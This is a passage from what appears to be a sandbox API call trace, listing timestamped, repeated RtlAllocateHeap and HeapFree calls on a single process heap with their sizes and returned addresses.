dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0180.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0180.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 